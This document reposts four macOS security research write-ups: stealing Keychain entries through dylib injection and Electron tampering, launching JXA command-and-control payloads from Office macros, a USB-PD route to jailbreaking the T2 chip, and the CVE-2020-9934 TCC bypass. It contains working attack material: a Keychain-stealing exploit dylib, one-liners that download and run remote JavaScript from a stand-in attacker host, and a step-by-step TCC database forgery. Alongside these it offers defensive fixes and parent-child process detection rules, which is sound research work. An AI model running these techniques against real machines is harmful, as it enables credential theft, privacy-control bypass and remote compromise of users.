Stealing macOS apps' Keychain entries

Original text by Wojciech Reguła

Storing secrets on macOS is a big challenge and can be done in multiple insecure ways. I have tested many Mac apps during bug bounty assessments and observed that developers tend to place secrets in preferences or even in hidden flat files. The problem with that approach is that any non-sandboxed application running with typical permissions can access that confidential data.

For example, Signal on macOS stores the key that encrypts your entire message database in ~/Library/Application Support/Signal/config.json.

Signal encryption key

macOS Keychain

Apple tells us that "The keychain is the best place to store small secrets, like passwords and cryptographic keys". The Keychain is a really powerful mechanism that allows developers to define access control lists (ACLs) to restrict access to entries. Applications can also be signed with keychain-group entitlements in order to access secrets shared with other apps. The following Objective-C code saves a confidential value in the Keychain:

#include <Security/Security.h>
#include <CoreFoundation/CoreFoundation.h>
#include <stdbool.h>
#include <string.h>

bool saveEntry(void) {
    OSStatus res;
    CFStringRef keyLabel = CFSTR("MySecret");
    const char *secret = "<secret data...>";
    // kSecValueData expects CFDataRef, so wrap the raw bytes in a CFData
    CFDataRef secretData = CFDataCreate(NULL, (const UInt8 *)secret, strlen(secret));
    // use the standard value callbacks so the dictionary retains its values
    CFMutableDictionaryRef attrDict = CFDictionaryCreateMutable(NULL, 3,
        &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    CFDictionaryAddValue(attrDict, kSecAttrLabel, keyLabel);
    CFDictionaryAddValue(attrDict, kSecValueData, secretData);
    CFDictionaryAddValue(attrDict, kSecClass, kSecClassGenericPassword);

    res = SecItemAdd(attrDict, NULL);
    CFRelease(secretData);
    CFRelease(attrDict);
    return res == errSecSuccess;
}
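
For reference, a file containing this function (plus a small main() that calls it) can be compiled against the required frameworks along these lines (file names are illustrative):

$ clang keychain_saver.c -o KeychainSaver -framework Security -framework CoreFoundation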

And when executed, you should see that the entry has been successfully added:

My secret

Stealing the entry – technique #1

The first technique is to verify whether the application has been signed with the Hardened Runtime or the Library Validation flag. Yes, the Keychain doesn't detect code injection… So simply use the following command:

$ codesign -d -vv /path/to/the/app
Executable=/path/to/the/app
Identifier=KeychainSaver
Format=Mach-O thin (x86_64)
CodeDirectory v=20200 size=653 flags=0x0(none) hashes=13+5 location=embedded Signature size=4755
Authority=Apple Development: [REDACTED]
Authority=Apple Worldwide Developer Relations Certification Authority
Authority=Apple Root CA
Signed Time=29 Oct 2020 at 19:40:01
Info.plist=not bound
TeamIdentifier=[REDACTED]
Runtime Version=10.15.6
Sealed Resources=none
Internal requirements count=1 size=192

If the flags are 0x0 and there is no __RESTRICT Mach-O segment (that segment is really rare), you can simply inject a malicious dylib into the app's main executable. Create an exploit.m file with the following contents:

#import <Foundation/Foundation.h>
#import <Security/Security.h>

__attribute__((constructor)) static void pwn(int argc, const char **argv) {
    NSLog(@"[+] Dylib injected");

    OSStatus res;
    CFTypeRef entryRef;

    CFStringRef keyLabel = CFSTR("MySecret");
    // query for the generic password item labeled "MySecret" and return its data
    CFMutableDictionaryRef attrDict = CFDictionaryCreateMutable(NULL, 3,
        &kCFTypeDictionaryKeyCallBacks, &kCFTypeDictionaryValueCallBacks);
    CFDictionaryAddValue(attrDict, kSecAttrLabel, keyLabel);
    CFDictionaryAddValue(attrDict, kSecClass, kSecClassGenericPassword);
    CFDictionaryAddValue(attrDict, kSecReturnData, kCFBooleanTrue);

    res = SecItemCopyMatching(attrDict, (CFTypeRef *)&entryRef);
    if (res == errSecSuccess) {
        NSData *resultData = (__bridge NSData *)entryRef;
        NSString *entry = [[NSString alloc] initWithData:resultData encoding:NSUTF8StringEncoding];
        NSLog(@"[+] Secret stolen: %@", entry);
    }
    exit(0);
}

Compile it:

gcc -dynamiclib exploit.m -o exploit.dylib -framework Foundation -framework Security

And inject:

$ DYLD_INSERT_LIBRARIES=./exploit.dylib ./KeychainSaver
2020-10-30 19:33:46.600 KeychainSaver [+] Dylib injected
2020-10-30 19:33:46.628 KeychainSaver [+] Secret stolen: <secret data…>

Stealing the entry – technique #2

What if the executable has been signed with the Hardened Runtime? The bypass is similar to the one I showed you in the XPC exploitation series. Grab an old version of the analyzed binary that was signed without the Hardened Runtime and inject the dylib into it. The Keychain will not verify the binary's version and will hand you the secret.

Proposed fix for developers: create a Keychain Access Group and move the secrets there. As the old version of the binary wouldn't be signed with that keychain group entitlement, it wouldn't be able to get the secret (see the docs; a sketch follows).
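
As a sketch of that setup (the team ID and group name below are placeholders, not from the original post), the developer signs the app with a keychain-access-groups entitlement and re-signs every release with the same group:

$ cat > entitlements.plist <<'EOF'
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>keychain-access-groups</key>
    <array>
        <string>TEAMID.com.example.shared-secrets</string>
    </array>
</dict>
</plist>
EOF
$ codesign -f -s "Apple Development" --entitlements entitlements.plist /path/to/the/app

On the code side, the item is then stored with kSecAttrAccessGroup set to the same group string, so a binary signed without that entitlement cannot query it.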

Stealing the entry – technique #3

Keep in mind that the com.apple.security.disable-library-validation entitlement will allow you to inject a malicious dynamic library even if the Hardened Runtime is set.
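
You can quickly check for that entitlement with codesign (the path is a placeholder):

$ codesign -d --entitlements :- /path/to/the/app | grep -A1 disable-library-validation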

Stealing the entry – technique #4

As Jeff Johnson proved in his article, TCC checks the code signature of an app only superficially. The same problem exists in the Keychain. Even if the signature of the whole bundle is invalid, the Keychain will only verify that the main executable has not been tampered with. Let's take one of the Electron applications installed on your device; I'm pretty sure you have at least one (Microsoft Teams, Signal, Visual Studio Code, Slack, Discord, etc.). As has been proven many times, Electron apps cannot store your secrets securely.

This is another example of why that is true. Even if you sign an Electron app with the Hardened Runtime, a malicious application may change the JavaScript files containing the actual code. Let's take a look at GitHub Desktop.app. It stores the user's session secret in the Keychain:

GitHub Desktop keychain entry

And it is validly signed:

$ codesign -d --verify -v /Applications/GitHub\ Desktop.app
/Applications/GitHub Desktop.app: valid on disk
/Applications/GitHub Desktop.app: satisfies its Designated Requirement

Next, change one of the JS files and verify the signature:

$ echo "/* test */" >> /Applications/GitHub\ Desktop.app/Contents/Resources/app/ask-pass.js
$ codesign -d --verify -v /Applications/GitHub\ Desktop.app
/Applications/GitHub Desktop.app: a sealed resource is missing or invalid
file modified: /Applications/GitHub Desktop.app/Contents/Resources/app/ask-pass.js

You can see that the signature is broken, but GitHub Desktop will launch normally and load the secret saved in the Keychain:

GitHub Desktop loads the entry from the Keychain

To prevent modifications, Electron implemented a mechanism called asar-integrity. It calculates a SHA512 hash of the application code and stores it in the Info.plist file. The problem is that it doesn't stop these injections. If the main executable has not been signed with the Hardened Runtime or the Kill flag and doesn't contain restricted entitlements, you can simply modify the asar file, calculate a new checksum, and update the Info.plist file. If those flags or entitlements are set, you can always use the ELECTRON_RUN_AS_NODE environment variable and, again, execute code in the main executable's context, which allows stealing the Keychain entries.
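
As a sketch of the ELECTRON_RUN_AS_NODE variant (the JavaScript here is illustrative): the variable makes the signed Electron binary behave like a plain Node process, so arbitrary JavaScript runs under the app's identity, and from there it can query the app's Keychain items:

$ ELECTRON_RUN_AS_NODE=1 "/Applications/GitHub Desktop.app/Contents/MacOS/GitHub Desktop" \
      -e 'console.log("running as", process.execPath)'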

Summary

As I showed you in this post, secure secret storage in the Keychain is really hard to achieve. There are multiple ways to bypass the access control mechanism, as the code signature checks of the requesting executables are done only superficially.

The biggest problem is with Electron apps, which simply cannot store secrets in the Keychain securely. Keep in mind that any framework that stores the actual code outside of the main executable may be tricked into loading malicious code.

If you know any other cool Keychain bypass techniques, please contact me. I’d be happy to update this post. 😉

Running JXA Payloads from macOS Office Macros

Original text by Cedric Owens

Despite being quite antiquated, MS Office macros continue to be used by red teams (and attackers) because they are easy to craft and they still work (and on the macOS side of the house, they often go undetected unless defenders build custom content). I have written MS Office macros for a couple of different macOS C2 tools in the past, and in both cases I used Python as the means of running the C2 payload.

With the macOS offensive-tooling landscape starting to shift away from Python, I thought I would take a look at how to write macros for macOS without using Python. Below I walk through that process.

I tried a few things to see what would and would not execute in the macOS app sandbox (where anything spawned by an MS Office macro runs). I found that several utilities I wanted to use could not execute in the sandbox. I tested the items below from VBA using MacScript ("do shell script ..."):

  • I tried using osascript to launch a JXA JavaScript file: osascript -l JavaScript -e "eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('[url_to_jxa_js_file]')),$.NSUTF8StringEncoding)));" → osascript is permitted in the app sandbox, but the -l JavaScript option was not during my testing
  • I tried building Objective-C code on the fly, compiling, and executing via the command line: echo "#import <Foundation/Foundation.h>\n#import <AppKit/AppKit.h>\n#import <OSAKit/OSAKit.h>\n#include <pthread.h>\n#include <assert.h>\n\nint main(int argc, const char * argv[]) {\n\t@autoreleasepool {\n\t\tNSString *encString = @\"eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding($.NSData.dataWithContentsOfURL($.NSURL.URLWithString('[JXApayloadURL]')),$.NSUTF8StringEncoding)));\";\n\t\tOSALanguage *lang = [OSALanguage languageForName:@\"JavaScript\"];\n\t\tOSAScript *script = [[OSAScript alloc] initWithSource:encString language:lang];\n\t\tNSDictionary *__autoreleasing compileError;\n\t\tNSDictionary *__autoreleasing runError;\n\t\t[script compileAndReturnError:&compileError];\n\t\tNSAppleEventDescriptor* res = [script executeAndReturnError:&runError];\n\t\tBOOL didSucceed = (res != nil);\n\t}\n\treturn 0;\n}" >> jxa.m && clang -fmodules jxa.m -o jxa && ./jxa → clang (as well as gcc) was not permitted to execute in the sandbox during my testing
  • Next I went very simple and just tried to invoke curl to download a hosted JXA .js payload and to invoke that payload via osascript… THAT DID WORK (a minimal sketch follows the screenshots below):
JXA payload downloaded and run
Mythic payload executed
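
Since that step appears only as screenshots in the original post, here is a minimal sketch of the chain (URL and path are placeholders; how the generator gets osascript to treat the downloaded file as JavaScript rather than AppleScript is an implementation detail not shown here):

$ curl -s https://attacker.example/payload.js -o /tmp/payload.js
$ osascript /tmp/payload.js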

Note: There is nothing really advanced or complex in the code above. Since these command-line binaries are allowed in the app sandbox, this made for an easy way to perform this action without using Python.

Here is my GitHub repo with the macro generator code that produces VBA code similar to the above:

https://github.com/cedowens/Mythic-Macro-Generator

In my testing I used Mythic's apfell HTTP JXA .js payloads:

https://github.com/its-a-feature/Mythic

What is neat about Mythic is that even though this method launches the Mythic agent inside of the app sandbox, Mythic is still able to execute some functions outside of the sandbox due to how it invokes ObjC calls to perform those functions.

Detection

Since my macro generator produces code that relies on the command line, detections are pretty straightforward. I ran Patrick Wardle's ProcessMonitor tool (which uses the Endpoint Security framework) to capture events when I launched the macro and connected to Mythic. Here is a screenshot of the capture:


In summary, parent-child detections can be used to detect this macro:

  • Office Product (ex: Microsoft Word.app) → /bin/sh
  • Office Product (ex: Microsoft Word.app) → /bin/bash
  • Office Product (ex: Microsoft Word.app) → /usr/bin/curl

I recommend blue teams roll out the detections above, as there should be little to no legitimate activity stemming from these parent-child relationships.
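
As a usage sketch (the exact filter is mine, not from the original post), Objective-See's ProcessMonitor can surface those chains from the command line:

$ sudo ./ProcessMonitor.app/Contents/MacOS/ProcessMonitor -pretty | grep -E -B2 -A8 'curl|/bin/sh|/bin/bash'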

Plug’nPwn — Connect to Jailbreak

Original text by T2

State of the World: checkm8, checkra1n and the T2
For those just joining us, news broke last week about the jailbreaking of Apple's T2 security processor in recent Macs. If you haven't read it yet, you can catch up on the story here, and try this out yourself at home using the latest build of checkra1n. So far we've stated that you must put the computer into DFU mode before you can run checkra1n to jailbreak the T2, and that remains true; however, today we are introducing a demo of replacing a target Mac's EFI and releasing details on the T2 debug interface.
A Monkey by any Other Name
Unlike app developers, Apple has to debug the core operating system in order to build its products. This is how firmware, the kernel, and the debugger itself are built and debugged. Since the earliest days of the iPod, Apple has built specialized debug probes for building its products. These devices have leaked from Apple headquarters and its factories, and have traditionally had monkey-related names such as "Kong", "Kanzi" and "Chimp". They work by allowing access to special debug pins of the CPU (which for ARM devices is called Serial Wire Debug, or SWD), as well as to other chips via JTAG and UART. JTAG is a powerful protocol allowing direct access to the components of a device, and such access generally provides the ability to circumvent most security measures. Apple has even spoken about its debug capabilities in a BlackHat talk describing the security measures in effect, and has deployed versions of these probes to its retail locations to allow for repair of iPads and Macs.
The Bonobo in the Myst
Another hardware hacker and security researcher, Ramtin Amin, did work last year to create an effective clone of the Kanzi cable. This, combined with the checkm8 vulnerability from axi0mX, allows iPhones from the 5s through the X to be debugged.
The USB port on the Mac
One of the interesting questions is how the Mac shares a USB port between both the Intel CPU (macOS) and the T2 (bridgeOS) for DFU. These are essentially separate computers inside the case sharing the same pins. Schematics of the MacBook have leaked from Apple's vendors (a quick search with a part number and "schematic"), and analysis of the USB-C firmware update payload shows that there is a component on each port which is tasked with both multiplexing (allowing the port to be shared) and terminating USB Power Delivery (USB-PD) for charging the MacBook or connected devices. Further analysis shows that this port is shared between the following:

  • The Thunderbolt controller, which allows the port to be used by macOS as Thunderbolt, USB 3 or DisplayPort
  • The T2 USB host for DFU recovery
  • Various UART serial lines
  • The debug pins of the T2
  • The debug pins of the Intel CPU, for debugging EFI and the macOS kernel

Like the iPhone documentation above, the debug lanes of a Mac are only available if enabled via the T2. Prior to the checkm8 bug, this required a specially signed payload from Apple, meaning that Apple holds a skeleton key to debug any device, including production machines. Thanks to checkm8, any T2 can be demoted and the debug functionality enabled. Unfortunately, Intel has placed large amounts of information about the Thunderbolt controllers and protocol under NDA, meaning that they have not been properly researched, which has led to a string of vulnerabilities over the years.
The USB-C Plug and USB-PD

Given that the USB-C port on the Mac does many things, it is necessary to indicate to the multiplexer which device inside the Mac you'd like to connect to. The USB-C port specification provides pins for this exact purpose (CC1/CC2), which also detect the orientation of the cable, allowing it to be reversible. On top of the CC pins runs another low-speed protocol called USB-PD, or USB Power Delivery. It is primarily used to negotiate power requirements between chargers (sources) and devices (sinks). USB-PD also allows for arbitrary packets of information in what are called "Vendor Defined Messages", or VDMs.
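
For the curious, the structured VDM header layout is public in the USB-PD specification, so assembling one is simple arithmetic; a quick sketch (the command code below is purely illustrative, since Apple's actual T2 action codes are undocumented; 0x05AC is Apple's USB vendor ID):

$ svid=0x05AC; cmd=0x01
$ printf 'VDM header: 0x%08X\n' $(( (svid << 16) | (1 << 15) | cmd ))
VDM header: 0x05AC8001

Bits 31..16 carry the SVID, bit 15 marks the message as a structured VDM, and bits 4..0 carry the command.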

Apple’s USB-PD Extensions
The VDM mechanism allows Apple to trigger actions and specify the target of a USB-C connection. We have discovered USB-PD payloads that cause the T2 to be rebooted and that hold the T2 in a DFU state. Putting these two actions together, we can cause the T2 to restart ready to be jailbroken by checkra1n without any user interaction. While we haven't tested an Apple Serial Number Reader, we suspect it works in a similar fashion, allowing the device's ECID and serial number to be read from the T2's DFU reliably. The Mac also speaks USB-PD to other devices, such as when an iPad Pro is connected in DFU mode.
Apple needs to document the entire set of VDM messages used in its products so that consumers can understand the security risks. The commands we issue are unauthenticated; and even if they were authenticated, they are undocumented and thus un-reviewed. Apple could have prevented this scenario by requiring some physical attestation during these VDMs, such as holding down the power button at the same time.

Putting it Together
Taking all this information into account, we can string it together into a real-world attack. By creating a specialized device about the size of a power charger, we can place the T2 into DFU mode, run checkra1n, replace the EFI, and upload a key logger to capture all keystrokes. This is possible even though macOS is unaltered (the logo at boot is for effect and need not be changed), because in Mac portables the keyboard is connected directly to the T2 and passed through to macOS.

VIDEO DEMO
PlugNPwn is the entry into DFU directly from connecting a cable to the DFU port (if the video doesn't show, it may be your ad blocker: https://youtu.be/LRoTr0HQP1U)

PlugN’Pwn Automatic Jailbreak
In the next video we use checkra1n to modify the MacEFI payload for the Intel processor (again, an ad blocker may prevent it from showing: https://youtu.be/uDSPlpEP-T0)

USB-C Debug Probe

In order to facilitate further research into USB-PD security, and to allow users at home to perform similar experiments, we are pleased to announce pre-ordering of our USB-PD Screamer. It allows a computer to directly "speak" USB-PD to a target device. Get more info here:

[PRE-SALE] USB-PD Screamer

$49.99

This miniature USB-to-Power-Delivery adapter lets you experiment with the USB Power Delivery protocol and discover hidden functionality in various Type-C devices.

Capabilities you might discover include but are not limited to serial ports, debug ports (SWD, JTAG, etc.), automatic restart, automatic entry to firmware update boot-loader.

Tested to work with Apple Type-C devices such as iPad Pro and MacBook (T1 and T2) to expose all functionality listed above (SWD does not work on iPad because no downgrade is available).

WARNING! This probe is NOT an SWD/serial probe by itself. It only allows you to send the needed PD packets to mux SWD/serial out, and exposes those lines on the test pads. If you want to use SWD/serial, you WILL need another SWD/serial probe/adapter connected upstream to the test pads.

ABSOLUTELY NOT for experiments with 9/15/20v or anything other than 5v.

Only for arbitrary PD messages.

Dimensions: 10 x 15 mm (excluding the Type-C plug)

Connectivity: USB for controlling custom PD messages; test points for the USB-Top, USB-Bottom, and SBU lines for connecting upstream devices that utilize the exposed functionality.

CVE-2020–9934: Bypassing the macOS Transparency, Consent, and Control (TCC) Framework for unauthorized access to sensitive user data

Original text by Matt Shockley

Background

The Transparency, Consent, and Control (TCC) Framework is an Apple subsystem which denies installed applications access to ‘sensitive’ user data without explicit permission from the user (generally in the form of a pop-up message). While TCC also runs on iOS, this bug is restricted to the macOS variant. To learn more about how TCC works, especially with Catalina, I recommend reading this article.

TCC prompt when opening Spotify for the first time

If an application attempts to access files in a directory protected by TCC without user authorization, the file operation will fail. TCC stores these user-level entitlements in a SQLite3 database on disk at $HOME/Library/Application Support/com.apple.TCC/TCC.db. Apple uses a dedicated daemon, tccd, for each logged-in user (plus one system-level daemon) to handle TCC requests. These daemons sit idle until they receive an access request from the OS for an application attempting to access protected data.

listing currently running TCC daemons
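
For reference, a listing like that can be reproduced with a simple process listing; expect one tccd per logged-in user plus a system instance running as root:

$ ps aux | grep [t]ccd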

When the daemon receives such a request, it first checks the TCC database to see whether the user has previously allowed or denied this application access to the requested data. If so, TCC uses the previous decision; otherwise it prompts the user to choose whether to allow access. Thus, if an application can gain write access to this TCC database, it can not only grant itself every TCC entitlement, but also do so without ever prompting the user.

The Bug

Obviously, being able to write directly to the database completely defeats the purpose of TCC, so Apple protects the database itself with TCC and System Integrity Protection (SIP). Even a program running as root cannot modify this database unless it has the com.apple.private.tcc.manager and com.apple.rootless.storage.TCC entitlements. However, the database is still technically owned by and readable/writable by the currently logged-in user, so as long as we can find a program with those entitlements, we can control the database.

TCC database permissions
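
You can check the ownership yourself (note that on Catalina, Terminal first needs Full Disk Access just to list this path):

$ ls -l "$HOME/Library/Application Support/com.apple.TCC/TCC.db"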

Since the TCC daemon is directly responsible for reading and writing to the TCC database, it’s a prime candidate!

tccd entitlements
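
These entitlements can be dumped with codesign; the path below is the Catalina-era location of tccd and may differ on other macOS versions:

$ codesign -d --entitlements :- /System/Library/PrivateFrameworks/TCC.framework/Resources/tccd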

Immediately after opening the TCC daemon in Ghidra and looking for code that was related to handling database operations, I noticed something that didn’t seem right.

ghidra decompiler view of database opening code

Essentially, when the TCC daemon attempts to open the database, the program directly opens (or creates, if it doesn't already exist) the SQLite3 database at $HOME/Library/Application Support/com.apple.TCC/TCC.db. While this seems inconspicuous at first, it becomes more interesting when you realize that you can control the location the TCC daemon reads from and writes to if you can control what the $HOME environment variable contains.

tricking TCC to use a non-SIP protected directory for the database

I initially dismissed this as a fun trick, since the actual TCC daemon running via launchd completely ignores this database and is the only daemon the OS communicates with when doing authorization events. However, a few days later I stumbled across this Stack Exchange post and realized that since the TCC daemon runs via launchd within the current user's domain, I could also control all the environment variables passed to it at launch! Thus, I could set the $HOME environment variable in launchctl to point to a directory I control, restart the TCC daemon, and then directly modify the fake TCC database to give myself every TCC entitlement available without ever prompting the end user. As this doesn't actually modify the SIP-protected TCC database, the bug also has the added benefit of completely resetting TCC to its previous state once $HOME is unset in launchctl and the daemon is restarted.

Proof of Concept

The POC for this bug is actually pretty simple and requires no code to be written.

# reset database just in case (no cheating!)
$> tccutil reset All

# mimic TCC's directory structure from ~/Library
$> mkdir -p "/tmp/tccbypass/Library/Application Support/com.apple.TCC"

# cd into the new directory
$> cd "/tmp/tccbypass/Library/Application Support/com.apple.TCC/"

# set launchd $HOME to this temporary directory
$> launchctl setenv HOME /tmp/tccbypass

# restart the TCC daemon
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd

# print out contents of TCC database and then give Terminal access to Documents
$> sqlite3 TCC.db .dump
$> sqlite3 TCC.db "INSERT INTO access
VALUES('kTCCServiceSystemPolicyDocumentsFolder',
'com.apple.Terminal', 0, 1, 1,
X'fade0c000000003000000001000000060000000200000012636f6d2e6170706c652e5465726d696e616c000000000003',
NULL,
NULL,
'UNUSED',
NULL,
NULL,
1333333333333337);"

# list Documents directory without prompting the end user
$> ls ~/Documents
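
And to undo everything, per the reset behavior described above, clear the override and bounce the daemon:

$> launchctl unsetenv HOME
$> launchctl stop com.apple.tccd && launchctl start com.apple.tccd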

I also have a full Swift (because why not) proof of concept available on GitHub.

swift POC example output

Timeline

  • 26 Feb 2020: Issue reported to the Apple Product Security Team
  • 27 Feb 2020: Apple reviews report, begins investigation into issue
  • 23 Apr 2020: Apple confirms the bug will be fixed in a future update
  • 15 Jul 2020: Apple releases patch for the bug (Security Update 2020-004)

Contact

I’m trying out this Twitter Infosec thing, so reach out to me there!